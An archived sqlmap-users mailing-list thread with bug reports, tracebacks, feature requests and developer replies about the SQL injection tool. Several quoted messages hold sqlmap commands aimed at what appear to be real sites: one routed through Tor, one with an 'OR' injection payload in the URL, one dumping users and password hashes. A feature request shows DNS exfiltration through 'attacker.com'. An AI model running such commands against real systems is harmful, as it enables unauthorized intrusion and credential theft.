>> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>>
>> > Hi!
>> >
>> > This bug detected if add direct param.
>> >
>> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
>> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>> > --exclude-sysdbs
>> >
>> >
>> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>> retry
>> > your run with the latest development version from the GitHub
>> repository. If
>> > the exception persists, please send by e-mail to '
>> > sql...@li...' or open a new issue at '
>> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>> > text and any information required to reproduce the bug. The developers
>> will
>> > try to reproduce the bug, fix it accordingly and get back to you.
>> > sqlmap version: 1.0-dev-de99717
>> > Python version: 2.7.3
>> > Operating system: posix
>> > Command line: sqlmap.py -d
>> > **************************************************** -u
>> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>> > --exclude-sysdbs
>> > Technique: None
>> > Back-end DBMS: MySQL (identified)
>> > Traceback (most recent call last):
>> > File "sqlmap.py", line 87, in main
>> > start()
>> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
>> > start
>> > action()
>> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>> > setHandler()
>> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
>> > setHandler
>> > conf.dbmsConnector.connect()
>> > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
>> > connect
>> > self.connector = pymysql.connect(host=self.hostname, user=self.user,
>> > passwd=self.password, db=self.db, port=self.port,
>> > connect_timeout=conf.timeout, use_unicode=True)
>> > File
>> >
>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
>> > line 93, in Connect
>> > return Connection(*args, **kwargs)
>> > File
>> >
>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>> > line 584, in __init__
>> > self._connect()
>> > File
>> >
>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>> > line 739, in _connect
>> > sock.connect((self.host, self.port))
>> > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
>> > connect
>> > raise GeneralProxyError((5, _generalerrors[5]))
>> > GeneralProxyError: (5, 'bad input')
>> >
>> >
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Precog is a next-generation analytics platform capable of advanced
>> > analytics on semi-structured data. The platform includes APIs for
>> building
>> > apps and a phenomenal toolset for data science. Developers can use
>> > our toolset for easy data analysis & visualization. Get a free account!
>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 10
>> Date: Tue, 16 Apr 2013 23:26:39 +0200
>> From: buawig <bu...@gm...>
>> Subject: [sqlmap-users] feature request: offline mode for
>> --dns-domain?
>> To: SqlMap List <sql...@li...>
>> Message-ID: <516...@gm...>
>> Content-Type: text/plain; charset=UTF-8
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA512
>>
>> Hi,
>>
>> in cases where sqlmap is run against targets on internal networks it
>> would be great if one could tell sqlmap to simply proceed without
>> expecting incoming DNS requests, because sqlmap can not be executed
>> directly on the DNS server (which can't reach the target, but the
>> target can reach the DNS server).
>>
>> For me it would be enough to simply run something like
>> - -u ... --dns-domain=attacker.com --dns-port=0
>> (--dns-port does not exist [yet])
>>
>> to let sqlmap know that it doesn't need to start a DNS listener.
>>
>> I would then collect and decode the DNS querries on the DNS server
>> manually, but I could also envision running a second sqlmap instance
>> on the DNS server with --dns-domain (but without -u) doing that job.
>>
>> -----BEGIN PGP SIGNATURE-----
>>
>> iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p
>> dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf
>> WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz
>> cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU
>> uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos
>> D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C
>> JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN
>> QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx
>> J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O
>> yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF
>> plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz
>> N5xHRCVPLLSrPfTPiyIJ
>> =JSkD
>> -----END PGP SIGNATURE-----
>>
>>
>>
>> ------------------------------
>>
>> Message: 11
>> Date: Tue, 16 Apr 2013 23:24:23 +0200
>> From: buawig <bu...@gm...>
>> Subject: [sqlmap-users] feature request: --dns-domain for non-root
>> users (--dns-port)
>> To: sql...@li...
>> Message-ID: <516...@gm...>
>> Content-Type: text/plain; charset=UTF-8
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA512
>>
>> Hi,
>>
>> I just wanted to request a "extension" for a previous feature request
>> (DNS exfiltration [1]) but after looking at my former feature request
>> I realized that it included already the feature I was about to request:
>>
>> - --dns-domain for non-root users:
>> - --dns-port
>>
>> The use-case is mentioned in the former feature request:
>>
>> [1] http://sourceforge.net/mailarchive/message.php?msg_id=27108100
>> -----BEGIN PGP SIGNATURE-----
>>
>> iQIcBAEBCgAGBQJRbcGHAAoJEJeRHQyF0ukM58gP/1o1qTQTI9bzk3Ez+2wcqign
>> F0BlB//+rB6CzBPsEvkRioefbJPIcbX9Kcq+IqDygtk8/ux9uR3s1nKyps6nmvY6
>> EXi4EY0e8uMPc2oXGkMVie1UOYvKiW7apnEEOoIgymLpx/UiXhu3fcjkVymIem7w
>> obHpd1pu+oIdXyt006yQDZzr9LRT1j/7mXF4fQ0kwrNJuRx+x/LUpRIoHrmn+JOC
>> VWn29ayUaK7+si1xilibMaOuUPk6Q/4mURoptXJ0DfPbXkk9z7+Zwz8ga30I8xZB
>> qpJtVpK/jxZAR8Bhc+SbKMNGSWDUlf8dweohRVFEYd6Bl0xZU4vbOF2WB9+z/0Go
>> kK7850lyldD+a1G/ilqr1IpyoV3Pxx11D0Kwg8ARoKUKosqjh02rgJQ/GLTJjgJj
>> QZmaDvVcV2NCeUKEJInR4BRVZDWqBVmA44ltfuswOEpz7pLo6oiz/3ZXyg0ad2m7
>> 775afpHgFslt2NsjVz1aU+B531Iglwx/8uuLkwtP30lWscp6Ng3GkB4MM+U7yM8d
>> tSXDlHmVxsJbBxX9rFy5KyRSrdyoQwdwqKyCmBpke/MyLz/NnLMolQUsk239Ljv+
>> ztA2EcK44MGuA5Rnr5uSmBoM6ZCB950JAjw2irvDBqpjfgD/T+lvc1MLcVykNu45
>> W8t1vxN9utvoag/kIeKJ
>> =UXOD
>> -----END PGP SIGNATURE-----
>>
>>
>>
>> ------------------------------
>>
>> Message: 12
>> Date: Tue, 16 Apr 2013 20:52:26 -0500
>> From: Brian Milliron <Br...@EC...>
>> Subject: [sqlmap-users] Domain credentials
>> To: sql...@li...
>> Message-ID: <516...@EC...>
>> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>>
>> What is the correct format to make a direct connection to a database
>> using windows domain credentials?
>> I have tried
>> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred
>> "DOMAIN\user:pass"
>> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred
>> "DOMAIN\\user:pass"
>> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred
>> "DOMAIN\user:pass" --auth-type NTLM
>> ./sqlmap.py -d "mssql://user:pass@10.10.10.10:1433/REMOTE_DB"
>>
>> I get this error "[CRITICAL] DB-Lib error message 20017, severity 9:
>> Unexpected EOF from the server
>> Net-Lib error during Operation now in progress Error 115 - Operation now
>> in progressDB-Lib error message 20002, severity 9:
>> Adaptive Server connection failed"
>>
>>
>>
>> ------------------------------
>>
>> Message:...
 
[truncated message content]

Re: [sqlmap-users] 回复： sqlmap-user event not found error

[Miroslav S. <mir...@gm...>]

Hi Bob.

It's a bash problem (reproduced it this moment). Using single quotes (')
instead of double quotes (") should solve this issue.

Kind regards,
Miroslav Stampar


On Tue, May 13, 2014 at 5:05 AM, Bob <sto...@qq...> wrote:

>
> Hi Miroslav,
>
>    Thanks for your email,
>
> but still the same after i tried  sqlmap  -u ".."
>
>
>
> sqlmap -u "
> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=aa
> "
> bash: !search.do?keyword=: event not found
>
>
> best regards
> bob
> ------------------
>
>
>
>
> ------------------ 原始邮件 ------------------
> *发件人:* "Miroslav Stampar";<mir...@gm...>;
> *发送时间:* 2014年5月11日(星期天) 晚上10:38
> *收件人:* "Bob"<sto...@qq...>;
> *抄送:* "SqlMap List"<sql...@li...>;
> *主题:* Re: [sqlmap-users] sqlmap-user event not found error
>
> Hi Bob.
>
> Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...)
>
> Kind regards,
> Miroslav Stampar
>
>
> On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:
>
>> Hi friend,
>>
>>  I have problem with ! inside URL .
>>
>> /sqlmap.py -u
>> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
>> bash: !search.do?keyword=: event not found
>>
>> How should i do ?
>>
>> thanks
>>
>> bob
>> ------------------
>>
>>
>>
>>
>> ------------------ Original ------------------
>> *From: * "Miroslav Stampar";<mir...@gm...>;
>> *Date: * Fri, May 31, 2013 03:00 AM
>> *To: * "Bob"<sto...@qq...>;
>> *Cc: * "sqlmap-users"<sql...@li...>;
>> *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
>>
>> Hi.
>> Have you been able to retrieve user names normally? I mean, were they
>> normally been displayed in console output?
>> Also, is boolean technique the only one detected by sqlmap in your case
>> (or maybe UNION)?
>>  Kind regards,
>> Miroslav Stampar
>>
>>
>> On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:
>>
>>> Hi friend,
>>>
>>>
>>> Could you help me with this bug ?
>>>
>>>
>>> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
>>> run with the latest development version from the GitHub repository. If the
>>> exception persists, please send by e-mail to '
>>> sql...@li...' or open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any information required to reproduce the bug. The developers will
>>> try to reproduce the bug, fix it accordingly and get back to you.
>>> sqlmap version: 1.0-dev
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: ./sqlmap -u
>>> ***********************************************
>>> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
>>> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
>>> SQL Server --users --passwords
>>> Technique: BOOLEAN
>>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>>> Traceback (most recent call last):
>>> File "./sqlmap", line 87, in main
>>> start()
>>> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
>>> action()
>>> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
>>> conf.dbmsHandler.getPasswordHashes(), "password hash",
>>> CONTENT_TYPE.PASSWORDS)
>>> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
>>> getPasswordHashes
>>> if user in retrievedUsers:
>>> TypeError: unhashable type: 'list'
>>>
>>> [*] shutting down at 22:54:12
>>> Thanks
>>>
>>> BOB
>>>
>>>
>>> ------------------ Original ------------------
>>> *From: * "sqlmap-users-request"<
>>> sql...@li...>;
>>> *Date: * May 29, 2013
>>> *To: * "sqlmap-users"<sql...@li...>;
>>> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>>>
>>> Send sqlmap-users mailing list submissions to
>>> sql...@li...
>>>
>>> To subscribe or unsubscribe via the World Wide Web, visit
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> or, via email, send a message with subject or body 'help' to
>>> sql...@li...
>>>
>>> You can reach the person managing the list at
>>> sql...@li...
>>>
>>> When replying, please edit your Subject line so it is more specific
>>> than "Re: Contents of sqlmap-users digest..."
>>>
>>>
>>> Today's Topics:
>>>
>>> 1. Re: Feature request (David Guimaraes)
>>> 2. Re: --load-cookies (Dirk Wetter)
>>> 3. Re: --load-cookies (Miroslav Stampar)
>>> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>>> (Miroslav Stampar)
>>> 5. Re: --load-cookies (Dirk Wetter)
>>> 6. --host parameter (co...@5i...)
>>> 7. Sqlmap and direct connect error (???????? ??????)
>>> 8. Re: --host parameter (Miroslav Stampar)
>>> 9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>>> 10. feature request: offline mode for --dns-domain? (buawig)
>>> 11. feature request: --dns-domain for non-root users (--dns-port)
>>> (buawig)
>>> 12. Domain credentials (Brian Milliron)
>>> 13. Re: Domain credentials (Brandon Perry)
>>> 14. Re: feature request: offline mode for --dns-domain?
>>> (Miroslav Stampar)
>>> 15. Re: Domain credentials (Miroslav Stampar)
>>> 16. Re: feature request: fetch DNS queries from DNS server via
>>> HTTP (buawig)
>>> 17. Re: feature request: fetch DNS queries from DNS server via
>>> HTTP (Miroslav Stampar)
>>> 18. MySQL error based technique bug (Konrads Smelkovs)
>>> 19. Re: MySQL error based technique bug (Miroslav Stampar)
>>> 20. SQLmap crashing (Phillip Wylie)
>>> 21. Re: SQLmap crashing (Miroslav Stampar)
>>> 22. Custom injection payload in POST (Marcell Fodor)
>>> 23. Re: SQLmap crashing (Miroslav Stampar)
>>> 24. I got error on windows (warezhacking)
>>> 25. Appending to a dump (Stephen Shkardoon)
>>> 26. Re: Appending to a dump (Miroslav Stampar)
>>> 27. Re: Appending to a dump (Stephen Shkardoon)
>>> 28. Re: Appending to a dump (Miroslav Stampar)
>>> 29. --ignore-404 ? (buawig)
>>> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (buawig)
>>> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (Miroslav Stampar)
>>> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (Miroslav Stampar)
>>> 33. Re: --ignore-404 ? (Miroslav Stampar)
>>> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>>> 35. Re: BUG...!!!! o.O (Miroslav Stampar)
>>> 36. gun...@gm... wants to follow you. Accept?
>>> (gun...@gm...)
>>> 37. Direct access to mysql database (Marcell Fodor)
>>> 38. Re: Direct access to mysql database (Miroslav Stampar)
>>> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>>> (Badoo)
>>> 40. Not getting any sensitive data from database (Marcell Fodor)
>>> 41. Re: Not getting any sensitive data from database
>>> (Miroslav Stampar)
>>> 42. unhandled exception (kvasilopoulos)
>>> 43. [SQLMAP] Unhandled exception for IPv6
>>> (e.n...@st...)
>>> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>> 45. Re: unhandled exception (Miroslav Stampar)
>>> 46. Passing SOAPAction in --header (Brandon Perry)
>>> 47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>>> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>> 49. Blind SQL Injection question (Guy Dufour)
>>> 50. Re: Blind SQL Injection question (Chris Oakley)
>>> 51. Re: Passing SOAPAction in --header (Brandon Perry)
>>> 52. Re: Passing SOAPAction in --header (Brandon Perry)
>>> 53. Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Alok Kumar)
>>> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Brandon Perry)
>>> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Alok Kumar)
>>> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Brandon Perry)
>>> 57. SQLMAP Bug (Joe O'Hara)
>>> 58. Re: SQLMAP Bug (Miroslav Stampar)
>>> 59. [CRITICAL] (Thai Thao)
>>> 60. Re: [CRITICAL] (Miroslav Stampar)
>>> 61. Providing multiple dbms (Sebastian Nerz)
>>> 62. Re: Providing multiple dbms (Miroslav Stampar)
>>>
>>>
>>> ----------------------------------------------------------------------
>>>
>>> Message: 1
>>> Date: Sat, 13 Apr 2013 21:40:39 -0300
>>> From: David Guimaraes <sk...@gm...>
>>> Subject: Re: [sqlmap-users] Feature request
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CAJ...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Good question Miroslav.. I tried to think in something that can be
>>> implemented without ruin sqlmap query schema, but I could not come to any
>>> conclusion... =(
>>>
>>> The thing is, sqlsus use a different approch to dump the data, making
>>> this
>>> kind of thing possible...
>>>
>>> The solution that I found in this particular scenario is to use sqlsus,
>>> unfortunately...
>>>
>>> Regards.
>>>
>>> David
>>>
>>>
>>> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
>>> mir...@gm...
>>> > wrote:
>>>
>>> > Hi David.
>>> >
>>> > And what do you recommend to be done in case of query with length >
>>> > max_inj_length?
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>>> >
>>> >> Hi, I am trying to perform sql injection on a web site but I can not
>>> get
>>> >> successful due to a size limitation on the query sent to the server.
>>> The
>>> >> server is limiting the size of query in 512 bytes only and sqlmap do
>>> not
>>> >> have any customization that allows me to bypass this restriction like
>>> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
>>> "autoconf"
>>> >> that measure the permited query size.
>>> >>
>>> >> There is some chance to put this kind of feature in sqlmap?
>>> >>
>>> >> Thanks.
>>> >>
>>> >> --
>>> >> David Gomes Guimar?es
>>> >>
>>> >>
>>> >>
>>> ------------------------------------------------------------------------------
>>> >> Own the Future-Intel&reg; Level Up Game Demo Contest 2013
>>> >> Rise to greatness in Intel's independent game demo contest.
>>> >> Compete for recognition, cash, and the chance to get your game
>>> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>>> >> _______________________________________________
>>> >> sqlmap-users mailing list
>>> >> sql...@li...
>>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >>
>>> >>
>>>
>>>
>>> --
>>> David Gomes Guimar?es
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 2
>>> Date: Mon, 15 Apr 2013 11:36:37 +0200
>>> From: Dirk Wetter <sp...@dr...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID: <516...@dr...>
>>> Content-Type: text/plain; charset=ISO-8859-1
>>>
>>>
>>>
>>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > Nevertheless, with the latest commit that check should be
>>> "neutralized" now. Could you please retry it now?
>>>
>>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> hiccups, using the same file:
>>>
>>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>> Traceback (most recent call last):
>>> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>> _really_load
>>> assert domain_specified == initial_dot
>>> AssertionError
>>>
>>> _warn_unhandled_exception()
>>> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
>>> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>
>>> the 999.. looks strange to me.
>>>
>>> >
>>> >
>>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>> mir...@gm... <mailto:mir...@gm...>> wrote:
>>> >
>>> > Hi Dirk.
>>> >
>>> > Well, I would say that you have an expired cookie. Do you see that
>>> value 0? That value should be a valid UNIX time representing time of cookie
>>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>>> "[WARNING] cookie '....' has expired"
>>> >
>>>
>>> that's true but IMO 0 represents just a session cookie. Example:
>>>
>>> prompt% wget -q -O /dev/null --keep-session-cookies
>>> --save-cookies=/dev/stdout bing.com
>>> # HTTP cookie file.
>>> # Generated by Wget on 2013-04-15 11:23:13.
>>> # Edit at your own risk.
>>>
>>> .bing.com TRUE / FALSE 1429089794 SRCHUSR
>>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>>> .bing.com TRUE / FALSE 1429089794 OrigMUID
>>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>>> .bing.com TRUE / FALSE 0 _HOP
>>> .bing.com TRUE / FALSE 0 _FS NU=1
>>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>> www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>> www.bing.com FALSE / FALSE 1429089794 MUIDB
>>> 333995A69E06630B2EB491169F016314
>>>
>>> prompt%
>>>
>>> Same parser problem btw if I edit the cookie file and put 1429089794
>>> unix time instead of 0 in there.
>>>
>>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>>> but cookies w/ expiration date) and uses the last
>>> cookie only for the first 120 tries.
>>>
>>> Cheers, Dirk
>>>
>>>
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> >
>>> >
>>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...>> wrote:
>>> >
>>> >
>>> > Hi Miroslav,
>>> >
>>> > thx for your prompt answer.
>>> >
>>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>> > > Hi Dirk.
>>> > >
>>> > > Could you please get the latest revision and retry it again?
>>> > ed5599f: almost the same: with cookie in the header sqlmap takes only
>>> this one.
>>> > The slight difference seems to be that in the case where I didn't
>>> supply a cookie
>>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>>> server anymore.
>>> > >
>>> > > There was a situation where info messages have been wrongly written
>>> that original response contained Set-Cookie in situations like yours.
>>> > >
>>> > > In case that everything stays as it is, I'll need to ask you to
>>> provide more details. For example, cookie file would be great.
>>> >
>>> > sure, here you go:
>>> >
>>> > --snip
>>> > # Netscape HTTP Cookie File
>>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>> > [..]
>>> > --snap
>>> >
>>> > They are all session cookies. For easier reading here I put some
>>> blanks in the line
>>> > above, in "cookie-file" there aren't any though. Cookies were
>>> generated with
>>> > stompy and a shell script (looks he same as with
>>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>>> <URL>)
>>> >
>>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>>> >
>>> > >
>>> > > Also, please make sure that the cookie file contains proper
>>> cookie(s) - domain name should be the same as a domain of target, cookie
>>> needs to have a proper valid time, etc.
>>> >
>>> > see above.
>>> >
>>> > Cheers,
>>> >
>>> > Dirk
>>> >
>>> > >
>>> > >
>>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>>> wrote:
>>> > >
>>> > > Hi Miroslav,
>>> > >
>>> > > yes unfortunately.
>>> > >
>>> > > If I omit the cookie line in the request header completely, sqlmap
>>> > > seems to take the first cookie issued by the server with set-cookie
>>> (and
>>> > > put's it silently in).
>>> > >
>>> > > Cheers,
>>> > >
>>> > > Dirk
>>> > >
>>> > >
>>> > >
>>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>> > > > Hi.
>>> > > >
>>> > > > And this is also happening if you are skipping "Cookie:
>>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>> > > >
>>> > > > Kind regards,
>>> > > > Miroslav Stampar
>>> > > >
>>> > > >
>>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>> > > >
>>> > > >
>>> > > > Hi folks,
>>> > > >
>>> > > > .... that doesn't work for me. It always uses the cookie supplied
>>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>> > > > from the 1st server reply is being used)
>>> > > >
>>> > > > So what is wrong in here:
>>> > > >
>>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>> > > > --level=2 --risk=2 -r $REQUEST
>>> > > >
>>> > > > The content of the file $REQUEST is:
>>> > > >
>>> > > > POST <URL> HTTP/1.1
>>> > > > Host: <HOST>
>>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>>> AppleWebKit/525.13 (KHTML, like Gecko)
>>> > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>>> http://0.2.149.6> Safari/525.13
>>> > > > Accept:
>>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> > > > Accept-Language: en-US,en;q=0.5
>>> > > > Accept-Encoding: gzip, deflate
>>> > > > Referer: <Referer>
>>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>> > > > Connection: keep-alive
>>> > > > Content-Type: application/x-www-form-urlencoded
>>> > > > Content-Length: 67
>>> > > >
>>> > > > <abunchofpostparams>
>>> > > >
>>> > > >
>>> > > > No hints that cookie-file is not in correct format (I've been
>>> through this,
>>> > > > at least I think I so ;) ).
>>> > > >
>>> > > > Any insight would be much appreciated.
>>> > > >
>>> > > >
>>> > > > Cheers,
>>> > > >
>>> > > > Dirk
>>> > > >
>>> > > >
>>> > > >
>>> ------------------------------------------------------------------------------
>>> > > > Precog is a next-generation analytics platform capable of advanced
>>> > > > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > > > apps and a phenomenal toolset for data science. Developers can use
>>> > > > our toolset for easy data analysis & visualization. Get a free
>>> account!
>>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > > > _______________________________________________
>>> > > > sqlmap-users mailing list
>>> > > > sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
